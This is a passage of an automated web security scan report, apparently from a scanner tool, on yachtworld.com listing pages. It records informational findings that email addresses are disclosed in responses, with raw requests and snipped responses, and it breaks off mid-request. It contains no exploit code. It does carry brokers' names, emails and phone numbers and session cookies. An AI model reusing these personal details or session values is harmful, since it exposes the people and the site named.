savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; latestSavedSearches=1_0_; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.25.10.1296155835; s_pers=%20s_nr%3D1296157084275%7C1298749084275%3B%20s_lv%3D1296157084277%7C1390765084277%3B%20s_lv_s%3DFirst%2520Visit%7C1296158884277%3B; s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:38:09 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 16699

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- /opt/weblogic/waeyw/ywcluster
...[SNIP]...
<br/>
Contact Doug Frazer at (252) 473-2860, Mobile 252-305-9475 or e-mail DFrazer@BluewaterYachtSales.com
</td>
...[SNIP]...

15.47. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_boat_detail.jsp

Issue detail

The following email addresses were disclosed in the response:

Justin@DenisonYachtSales.com
justin@denisonyachtsales.com

Request

Response

15.48. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_boat_detail.jsp

Issue detail

The following email address was disclosed in the response:

webmaster@yachtworld.com

Request

GET /core/listing/pl_boat_detail.jsp?checked_boats=2020426&hosturl=marinemaxcarolinas HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:26:27 GMT
Server: Apache
Cache-Control: private
Content-Length: 10863
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- /opt/weblogic/waeyw/ywcluster
...[SNIP]...
<P>
   This boat can no longer be found in our database. Please try again. If you continue to
   get this message, please send the URL of the previous page to webmaster@yachtworld.com
   along with an explanation. Thank you.</p>
...[SNIP]...

15.49. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_boat_detail.jsp

Issue detail

The following email address was disclosed in the response:

shawn@donnelly-yachts.com

Request

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:27:30 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 21706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- /opt/weblogic/waeyw/ywcluster
...[SNIP]...
<br />Email: shawn@donnelly-yachts.com</span>
...[SNIP]...

15.50. http://www.yachtworld.com/core/listing/pl_boat_full_detail.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_boat_full_detail.jsp

Issue detail

The following email address was disclosed in the response:

webmaster@yachtworld.com

Request

GET /core/listing/pl_boat_full_detail.jsp HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=4B0B0F72E37A07E93F136CA779786D04.boapp05; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; boats_temp_info=lf:ywlf; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=4318294598094503882; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; boats_session_info=session_uom:126:locale_currency_id:100; s_pers=%20s_nr%3D1296157124506%7C1298749124506%3B%20s_lv%3D1296157124508%7C1390765124508%3B%20s_lv_s%3DFirst%2520Visit%7C1296158924508%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.27.10.1296155835;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 22:39:07 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!DOCTYPE html PUBLIC "-//W3C
...[SNIP]...
<a href="mailto:webmaster@yachtworld.com">webmaster@yachtworld.com</a>
...[SNIP]...

15.51. http://www.yachtworld.com/core/rendering/email-boat.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/rendering/email-boat.htm

Issue detail

The following email address was disclosed in the response:

webmaster@yachtworld.com

Request

GET /core/rendering/email-boat.htm HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 500 Internal Server Error
Date: Thu, 27 Jan 2011 20:34:59 GMT
Server: Apache
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="mailto:webmaster@yachtworld.com">webmaster@yachtworld.com</a>
...[SNIP]...

15.52. http://www.yachtworld.com/core/rendering/print-boat.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/rendering/print-boat.htm

Issue detail

The following email address was disclosed in the response:

webmaster@yachtworld.com

Request

GET /core/rendering/print-boat.htm HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 500 Internal Server Error
Date: Thu, 27 Jan 2011 20:34:55 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="mailto:webmaster@yachtworld.com">webmaster@yachtworld.com</a>
...[SNIP]...

15.53. http://www.yachtworld.com/core/rendering/print-boat.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/rendering/print-boat.htm

Issue detail

The following email addresses were disclosed in the response:

eanderson@legendarymarine.com
info@legendarymarine.com

Request

GET /core/rendering/print-boat.htm?url=legendary&boatId=2266476&officeId=75325&isPLS=0 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2F